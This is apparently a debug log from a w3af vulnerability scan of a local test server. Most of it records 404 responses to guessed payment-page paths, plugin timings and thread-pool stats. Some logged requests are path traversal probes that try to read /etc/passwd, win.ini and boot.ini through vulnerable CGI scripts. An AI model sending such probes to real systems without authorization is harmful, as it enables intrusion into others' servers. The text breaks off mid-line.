NOT a 404 [URL 404 cache] [Wed Feb 12 09:42:20 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:20 2020 - debug] POST http://localhost:9090/module/complete.cgi returned HTTP code "404" (id=3116,from_cache=0,grep=1,rtt=0.25,did=YPPak2GI) [Wed Feb 12 09:42:20 2020 - debug] POST http://localhost:9090/servlet/validpay.cgi returned HTTP code "404" (id=3118,from_cache=0,grep=1,rtt=0.54,did=JellPztG) [Wed Feb 12 09:42:21 2020 - debug] GET http://localhost:9090/module/validation.aspx returned HTTP code "404" (id=3119,from_cache=0,grep=1,rtt=0.26,did=79l0leoF) [Wed Feb 12 09:42:21 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.php3 returned HTTP code "404" (id=3120,from_cache=0,grep=1,rtt=0.19,did=VtE1r5pP) [Wed Feb 12 09:42:21 2020 - debug] Invalid JSON format returned by Google, response status needs to be 200, got "The Google Web Search API is no longer available. Please migrate to the Google Custom Search API (https://developers.google.com/custom-search/)" instead. [Wed Feb 12 09:42:21 2020 - debug] GET http://localhost:9090/module/finished.php3 returned HTTP code "404" (id=3117,from_cache=0,grep=1,rtt=0.22,did=3ul5zsNE) [Wed Feb 12 09:42:21 2020 - debug] POST http://localhost:9090/modules/success.rb returned HTTP code "404" (id=3114,from_cache=0,grep=1,rtt=0.17,did=jSgcgz9E) [Wed Feb 12 09:42:21 2020 - debug] POST http://localhost:9090/inc/payment.jsp returned HTTP code "404" (id=3115,from_cache=0,grep=1,rtt=0.23,did=j7sVtYLa) [Wed Feb 12 09:42:21 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:21 2020 - debug] POST http://localhost:9090/includes/successful.rb returned HTTP code "404" (id=3113,from_cache=0,grep=1,rtt=0.11,did=1S3WTS7s) [Wed Feb 12 09:42:21 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:21 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:21 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:21 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:21 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:21 2020 - debug] GET http://localhost:9090/libraries/valid.aspx returned HTTP code "404" (id=3126,from_cache=0,grep=1,rtt=0.29,did=jGU12Q3Y) [Wed Feb 12 09:42:22 2020 - debug] GET http://localhost:9090/module/transactioncomplete.aspx returned HTTP code "404" (id=3125,from_cache=0,grep=1,rtt=0.16,did=VWziyXyf) [Wed Feb 12 09:42:22 2020 - debug] POST http://localhost:9090/servlet/payment.pl returned HTTP code "404" (id=3127,from_cache=0,grep=1,rtt=0.23,did=rZT6uGdW) [Wed Feb 12 09:42:22 2020 - debug] GET http://localhost:9090/module/validatepay.py returned HTTP code "404" (id=3129,from_cache=0,grep=1,rtt=0.36,did=Hr8lvEUn) [Wed Feb 12 09:42:22 2020 - debug] POST http://localhost:9090/inc/pay.jsp returned HTTP code "404" (id=3123,from_cache=0,grep=1,rtt=0.08,did=EmaLpZuc) [Wed Feb 12 09:42:22 2020 - debug] GET http://localhost:9090/module/validatepayment.pl returned HTTP code "404" (id=3131,from_cache=0,grep=1,rtt=0.33,did=6EYqd4gi) [Wed Feb 12 09:42:22 2020 - debug] POST http://localhost:9090/includes/pay returned HTTP code "404" (id=3133,from_cache=0,grep=1,rtt=0.09,did=ANvYSfMf) [Wed Feb 12 09:42:22 2020 - debug] POST http://localhost:9090/includes/final.php returned HTTP code "404" (id=3130,from_cache=0,grep=1,rtt=0.10,did=ZJil9do3) [Wed Feb 12 09:42:22 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:22 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:22 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:23 2020 - debug] GET http://localhost:9090/modules/return.jsp returned HTTP code "404" (id=3121,from_cache=0,grep=1,rtt=0.14,did=YZYvMpnH) [Wed Feb 12 09:42:23 2020 - debug] GET http://localhost:9090/servlet/completepayment.asp returned HTTP code "404" (id=3128,from_cache=0,grep=1,rtt=0.32,did=RaT6UDKR) [Wed Feb 12 09:42:23 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/learn") took 0.53s to run [Wed Feb 12 09:42:23 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:23 2020 - debug] objects.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:23 2020 - debug] error_500.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:23 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:23 2020 - debug] POST http://localhost:9090/libraries/validatepayment.php3 returned HTTP code "404" (id=3124,from_cache=0,grep=1,rtt=0.23,did=B7zLS6sn) [Wed Feb 12 09:42:23 2020 - debug] GET http://localhost:9090/module/trxcomplete.py returned HTTP code "404" (id=3132,from_cache=0,grep=1,rtt=0.37,did=YachDOmJ) [Wed Feb 12 09:42:23 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:23 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:23 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:23 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:23 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 132. [Wed Feb 12 09:42:23 2020 - vulnerability] The URL: "http://localhost:9090/learn" has a script tag with a source that points to a third party site ("maxcdn.bootstrapcdn.com"). This practice is not recommended, the security of the current site is being delegated to the external entity. This information was found in the request with id 468. [Wed Feb 12 09:42:23 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/learn") took 0.79s to run [Wed Feb 12 09:42:23 2020 - debug] GET http://localhost:9090/modules/paid.php4 returned HTTP code "404" (id=3122,from_cache=0,grep=1,rtt=0.19,did=2zvaQAtj) [Wed Feb 12 09:42:23 2020 - debug] Worker with ID WorkerThread(eMhX1dy3) has been running job 1445 for 109.68 seconds. The job is: _send_requests(((, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:30 2020 - debug] GET http://localhost:9090/modules/valid.py returned HTTP code "404" (id=3180,from_cache=0,grep=1,rtt=0.13,did=GyC2UDhH) [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(ZoPbaL8U) has been running job 155 for 153.76 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:284 @ __call__(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/payment_webhook_finder.py:130 @ crawl(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(6gcxf74d) has been running job 532 for 124.09 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/wordnet.py:59 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/wordnet.py:97 @ _generate_mutants(), /home/ayush/w3af/w3af/plugins/crawl/wordnet.py:199 @ _generate_fname(), /home/ayush/w3af/w3af/plugins/crawl/wordnet.py:130 @ _search_wn(), /home/ayush/w3af/w3af/core/data/nltk_wrapper/nltk_wrapper.py:61 @ __getattr__(), /home/ayush/w3af/w3af/core/data/nltk_wrapper/nltk_wrapper.py:52 @ __load(), /usr/local/lib/python2.7/dist-packages/nltk/corpus/reader/wordnet.py:1045 @ __init__(), /usr/local/lib/python2.7/dist-packages/nltk/corpus/reader/wordnet.py:1101 @ _load_lemma_pos_offset_map(), /usr/local/lib/python2.7/dist-packages/nltk/corpus/reader/wordnet.py:1106 @ () [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(NjMjnrCb) has been running job 652 for 32.62 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(SVfxFVXP) has been running job 54 for 157.75 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/infrastructure_plugin.py:52 @ discover_wrapper(), /home/ayush/w3af/w3af/core/controllers/misc/decorators.py:48 @ inner_runonce_meth(), /home/ayush/w3af/w3af/plugins/infrastructure/finger_bing.py:68 @ discover(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:340 @ map(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(br5sQhGq) has been running job 641 for 52.63 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(N5yqeDHB) has been running job 247 for 142.14 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:96 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:126 @ _run(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:393 @ map_async(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:365 @ test_generator(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:473 @ _parse_db_line() [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(XyVz5jPE) has been running job 267 for 134.53 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/data/url/extended_urllib.py:731 @ GET(), /home/ayush/w3af/w3af/core/data/url/extended_urllib.py:972 @ send(), /home/ayush/w3af/w3af/core/data/url/director.py:41 @ open(), /home/ayush/w3af/w3af/core/data/url/handlers/cache.py:88 @ http_response(), /home/ayush/w3af/w3af/core/data/url/handlers/cache_backend/db.py:102 @ store_in_cache(), /home/ayush/w3af/w3af/core/data/db/history.py:526 @ save(), /home/ayush/w3af/w3af/core/data/db/dbms.py:74 @ inner_verify_started(), /home/ayush/w3af/w3af/core/data/db/dbms.py:148 @ execute(), /home/ayush/w3af/w3af/core/data/db/dbms.py:326 @ query(), /usr/lib/python2.7/Queue.py:140 @ put() [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(ubgDPgOi) has been running job 606 for 115.51 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(z6MGDQIP) has been running job 628 for 86.36 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:42:30 2020 - debug] Worker with ID CrawlInfraWorker(1i39mCZz) has been running job 127 for 156.75 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/dir_file_bruter.py:88 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/dir_file_bruter.py:104 @ _bruteforce_directories(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 09:42:30 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 09:42:30 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:42:30 2020 - debug] CrawlInfraWorker worker pool has 99 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:42:30 2020 - debug] POST http://localhost:9090/includes/successful.php4 returned HTTP code "404" (id=3186,from_cache=0,grep=1,rtt=0.34,did=ptnvDNWQ) [Wed Feb 12 09:42:30 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.aspx returned HTTP code "404" (id=3174,from_cache=0,grep=1,rtt=0.17,did=51PXaoy3) [Wed Feb 12 09:42:30 2020 - debug] GET http://localhost:9090/module/validation.pl returned HTTP code "404" (id=3176,from_cache=0,grep=1,rtt=0.08,did=v3i5CLN8) [Wed Feb 12 09:42:31 2020 - debug] POST http://localhost:9090/includes/paymentsuccess.rb returned HTTP code "404" (id=3181,from_cache=0,grep=1,rtt=0.29,did=bezIu091) [Wed Feb 12 09:42:31 2020 - debug] url_session.grep(uri="http://localhost:9090/learn") took 2.40s to run [Wed Feb 12 09:42:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:31 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:31 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/learn") took 2.61s to run [Wed Feb 12 09:42:31 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/learn") took 2.80s to run [Wed Feb 12 09:42:31 2020 - debug] meta_tags.grep(uri="http://localhost:9090/learn") took 2.25s to run [Wed Feb 12 09:42:31 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/learn") took 2.71s to run [Wed Feb 12 09:42:31 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/learn") took 2.99s to run [Wed Feb 12 09:42:31 2020 - debug] http_in_body.grep(uri="http://localhost:9090/learn") took 2.99s to run [Wed Feb 12 09:42:31 2020 - debug] POST http://localhost:9090/includes/final.aspx returned HTTP code "404" (id=3185,from_cache=0,grep=1,rtt=0.28,did=z3TUl5nb) [Wed Feb 12 09:42:31 2020 - debug] POST http://localhost:9090/inc/pay.rb returned HTTP code "404" (id=3183,from_cache=0,grep=1,rtt=0.12,did=8cMFGeTQ) [Wed Feb 12 09:42:31 2020 - debug] localhost:9090 connection pool stats (free:45 / in_use:4 / max:50 / total:49) [Wed Feb 12 09:42:31 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.25 sec) (58295801e4769de9, 0.10 sec) (20c6fb7a85d275d0, 0.03 sec) (feefb3b1646a9d56, 0.02 sec) [Wed Feb 12 09:42:32 2020 - debug] POST http://localhost:9090/inc/completepayment.rb returned HTTP code "404" (id=3188,from_cache=0,grep=1,rtt=0.34,did=U5No2iDx) [Wed Feb 12 09:42:32 2020 - debug] GET http://localhost:9090/module/validatepayment.php3 returned HTTP code "404" (id=3187,from_cache=0,grep=1,rtt=0.14,did=eOFFTm4z) [Wed Feb 12 09:42:32 2020 - debug] credit_cards.grep(uri="http://localhost:9090/learn") took 2.96s to run [Wed Feb 12 09:42:32 2020 - debug] lang.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:32 2020 - debug] localhost:9090 connection pool stats (free:46 / in_use:4 / max:50 / total:50) [Wed Feb 12 09:42:32 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.31 sec) (20c6fb7a85d275d0, 0.09 sec) (feefb3b1646a9d56, 0.08 sec) (62e87e81607155f6, 0.06 sec) [Wed Feb 12 09:42:32 2020 - debug] strange_reason.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:32 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:32 2020 - debug] cache_control.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:32 2020 - debug] strange_headers.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:32 2020 - debug] oracle.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:32 2020 - debug] feeds.grep(uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:42:33 2020 - debug] POST http://localhost:9090/libraries/completepay returned HTTP code "404" (id=3192,from_cache=0,grep=1,rtt=0.24,did=VmXJrH4H) [Wed Feb 12 09:42:33 2020 - debug] POST http://localhost:9090/modules/success.php4 returned HTTP code "404" (id=3184,from_cache=0,grep=1,rtt=0.17,did=VVCgyj12) [Wed Feb 12 09:42:33 2020 - debug] GET http://localhost:9090/includes/paymentsuccessful.jsp returned HTTP code "404" (id=3100,from_cache=0,grep=1,rtt=0.07,did=McP33eTJ) [Wed Feb 12 09:42:33 2020 - vulnerability] A comment containing HTML code "[if lt IE 9]> returned HTTP code "404" (id=22624,from_cache=0,grep=1,rtt=0.04,did=8XNr0B1o) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/mYK7L.csp returned HTTP code "404" (id=22625,from_cache=0,grep=1,rtt=0.11,did=AHzBfn4t) [Wed Feb 12 10:04:24 2020 - debug] expect_ct.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] svn_users.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/postnuke/My_eGallery/public/displayCategory.php returned HTTP code "404" (id=22628,from_cache=0,grep=1,rtt=0.09,did=F5DLT6KB) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/cgi-bin/architext_query.cgi returned HTTP code "404" (id=22629,from_cache=0,grep=1,rtt=0.12,did=BNnd2hKy) [Wed Feb 12 10:04:24 2020 - debug] meta_generator.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] retirejs.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] serialized_object.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] blank_body.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] credit_cards.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] websockets_links.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] csp.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] dom_xss.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] vulners_db.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/scozbook/view.php?PG=whatever returned HTTP code "404" (id=22623,from_cache=0,grep=1,rtt=0.07,did=CCojDkhk) [Wed Feb 12 10:04:24 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/dlink/ returned HTTP code "404" (id=22622,from_cache=0,grep=1,rtt=0.12,did=7i6Ap1w8) [Wed Feb 12 10:04:24 2020 - debug] keys.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] clamav.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/multihtml.pl?multi=/etc/passwd\x00html returned HTTP code "404" (id=22620,from_cache=0,grep=1,rtt=0.11,did=d8T0FTSk) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/.../.../.../.../.../.../.../.../.../boot.ini returned HTTP code "404" (id=22626,from_cache=0,grep=1,rtt=0.06,did=evoH1bKG) [Wed Feb 12 10:04:24 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] objects.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] error_500.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/examples/servlet/AUX returned HTTP code "404" (id=22630,from_cache=0,grep=1,rtt=0.13,did=31jl5VCC) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4300. [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/put/cgi-bin/putport.exe?SWAP=&BOM=&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd returned HTTP code "404" (id=22631,from_cache=0,grep=1,rtt=0.10,did=AsNiWaa9) [Wed Feb 12 10:04:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11528, 'reject-seen-url': 5559, 'reject-out-of-scope': 215, 'accept': 4698} [Wed Feb 12 10:04:24 2020 - debug] meta_tags.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] password_profiling.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] localhost:9090 connection pool stats (free:96 / in_use:2 / max:50 / total:98) [Wed Feb 12 10:04:24 2020 - debug] Connections with more in use time: (650348b5951f295c, 0.10 sec) (b779ce238a0a32af, 0.09 sec) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/nsn/..\\util/copy.bas returned HTTP code "404" (id=22627,from_cache=0,grep=1,rtt=0.10,did=TjaSP6vJ) [Wed Feb 12 10:04:24 2020 - debug] url_session.grep(uri="http://localhost:9090/svc/payment.py") took 0.06s to run [Wed Feb 12 10:04:24 2020 - debug] click_jacking.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] lang.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] strange_reason.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] cache_control.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] strange_headers.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] ssn.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] oracle.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] feeds.grep(uri="http://localhost:9090/svc/payment.py") took 0.00s to run [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4301. [Wed Feb 12 10:04:24 2020 - debug] error_pages.grep(uri="http://localhost:9090/svc/payment.py") took 0.01s to run [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4302. [Wed Feb 12 10:04:24 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/svc/payment.py") took 0.01s to run [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4303. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4304. [Wed Feb 12 10:04:24 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/asp/sqlqhit.asp returned HTTP code "404" (id=22632,from_cache=0,grep=1,rtt=0.07,did=0w1ktlxk) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22634,from_cache=0,grep=1,rtt=0.09,did=CZI5u2iq) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/nph-trace/ returned HTTP code "404" (id=22637,from_cache=0,grep=1,rtt=0.11,did=plXMkBbu) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4305. [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/webmail/ returned HTTP code "404" (id=22635,from_cache=0,grep=1,rtt=0.05,did=C4e01AYO) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4306. [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\\&Opt=3 returned HTTP code "404" (id=22638,from_cache=0,grep=1,rtt=0.12,did=p07M3mgR) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=22639,from_cache=0,grep=1,rtt=0.13,did=SNQytmBE) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini\x00board=board_1 returned HTTP code "404" (id=22641,from_cache=0,grep=1,rtt=0.02,did=fqFpKw2O) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/upd/ returned HTTP code "404" (id=22633,from_cache=0,grep=1,rtt=0.10,did=TjhsYqw6) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4307. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4308. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4309. [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/cgi-bin/date returned HTTP code "404" (id=22636,from_cache=0,grep=1,rtt=0.05,did=vA0NW6bu) [Wed Feb 12 10:04:24 2020 - debug] GET 